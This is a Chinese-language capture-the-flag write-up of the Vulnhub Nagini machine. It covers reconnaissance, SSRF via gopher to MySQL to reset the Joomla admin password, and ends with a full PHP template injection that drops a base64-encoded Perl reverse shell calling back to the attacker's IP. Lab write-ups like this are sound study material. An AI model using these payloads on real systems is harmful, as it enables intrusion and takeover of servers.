打靶记录 HarryPotter Nagini

仍是来自vulnhub的靶机，直接开始吧

环境

虚拟机软件：VirtualBox 7.0.18
网络连接模式：仅主机模式
攻击机：kali-linux，ip为192.168.13.100
目标机：ip为192.168.13.103

渗透过程

nmap信息收集

端口扫描，并以全格式输出至nmapscan下：
nmap --min-rate 10000 -p- 192.168.13.104 -oA nmapscan/ports

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


root@yulock:~/Nagini# nmap --min-rate 10000 -p- 192.168.13.104 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 20:15 HKT
Nmap scan report for 192.168.13.104
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:EE:FC:CF (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 124.05 seconds

进行udp的top20端口扫描：
nmap -sU --min-rate 10000 --top-ports 20 192.168.13.104 -oA nmapscan/udp
没有扫出值得注意的信息，优先级放到tcp端口上

对22与80端口进行详细扫描：
nmap -sT -sV -sC -O -p22,80 192.168.13.104 -oA nmapscan/details

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


root@yulock:~/Nagini# nmap -sT -sV -sC -O -p22,80 192.168.13.104 -oA nmapscan/details
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 20:19 HKT
Nmap scan report for 192.168.13.104
Host is up (0.00052s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
|   256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_  256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:EE:FC:CF (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSH版本为7.9；web服务中间件为Apache，版本为2.4.38；操作系统为Debian

进行常规漏洞扫描：
nmap --script=vuln -p22,80 192.168.13.104 -oA nmapscan/vuln
没有出现明显的漏洞，端口扫描结束，渗透优先级80端口，其次22端口

web服务信息收集

进web服务看看

只有一张图片，拉取下来看看是否存在隐写：
wget http://192.168.13.104/harry_potter_2.jpg
binwalk harry_potter_2.jpg

未发现隐写，接下来进行目录暴破：
wfuzz -u http://192.168.13.104/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 --hl 5

跑出了joomla目录，看样子目标使用了joomla内容管理系统，接下来有请今天的工具：joomscan

joomscan：和wpscan类似，用于针对joomla系统进行信息收集，项目地址

扫出了备份文件：

拉取到本地查看，获取到数据库用户名与密码的信息

1
2


public $user = 'goblin';
public $password = '';

可以看到没有设置密码，但由于目标没有开放3306端口，只能暂时将其放一边

找不到更多信息了，重新进行目录扫描，看看会不会泄露其他文件格式的信息
可以用wfuzz的FUZZ.txt进行扫描，但我想同时扫描多个后缀，因此还是得用回gobuster：
gobuster dir -u http://192.168.13.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.html,.zip

扫出了note.txt，拉取下来查看其内容

1
2
3
4
5
6
7
8
9


Hello developers!!


I will be using our new HTTP3 Server at https://quic.nagini.hogwarts for further communications.
All developers are requested to visit the server regularly for checking latest announcements.


Regards,
site_amdin

需要我们用http3服务去访问https://quic.nagini.hogwarts来获取其他信息

先将该域名写入hosts文件：echo "192.168.13.104 quic.nagini.hogwarts" >> /etc/hosts
通过quiche进行http3访问，具体的搭建其他人已经写的很详细了，这里不细说
但我这不知出了什么问题，一直没有回显，只得看wp获取信息

内容如下：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15


<html>
    <head>
        <title>Information Page</title>
    </head>
    <body>
        Greetings Developers !
        I am having two announcements that I need to share with you:

        1.We no longer require functionality at /internalResourceFeTcher.php in our main production servers.So I will be removing the same by this week.
        2.All developers are requested not to put any configuration's backup file (.bak)in main production servers as they are readable by every one.

        Regards
        site_admin
    </body>
</html>

有两条信息，其一是网站中存在internalResourceFeTcher.php，其二是网站中可能存在后缀为bak的文件（这点已经通过joomscan扫出）

SSRF漏洞利用

看看internalResourceFeTcher.php的内容

内部网络资源获取，看样子存在SSRF，测试一下

确定存在SSRF，且支持http与file协议

看看gopher协议是否被过滤，gopher://127.0.0.1:22
测试发现未被过滤，结合之前我们得知目标存在mysql服务，可以通过gopher操作mysql

请出工具gopherus，用于快速生成gopher打内网服务的payload

传参后成功执行了sql语句，接下来找到joomla后台管理员用户并修改密码即可

最终执行的sql语句：use joomla;update joomla_users set password="e10adc3949ba59abbe56e057f20f883e" where username="site_admin";

密码为123456的md5加密结果

修改源码获得立足点

进入joomla的默认后台/joomla/administrator，通过之前修改的用户密码登陆

之前也打过CMS用joomla的靶机，和之前那次一样，登陆的用户都是最高管理员，因此可以直接修改模板源码来反弹shell

修改Beez3模板下的error.php，插入反弹shell的语句

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53


function which($pr)
{
    $path = execute("which $pr");
    return ($path ? $path : $pr);
}
function execute($cfe)
{
    $res = '';
    if ($cfe) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
function cf($fname, $text)
{
    if ($fp = @fopen($fname, 'w')) {
        @fputs($fp, @base64_decode($text));
        @fclose($fp);
    }
}
$yourip = "192.168.13.100";
$yourport = '9999';
$usedb = array('perl' => 'perl', 'c' => 'c');
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" .
    "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" .
    "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" .
    "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" .
    "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" .
    "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" .
    "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc', $back_connect);
$res = execute(which('perl') . " /tmp/.bc $yourip $yourport &");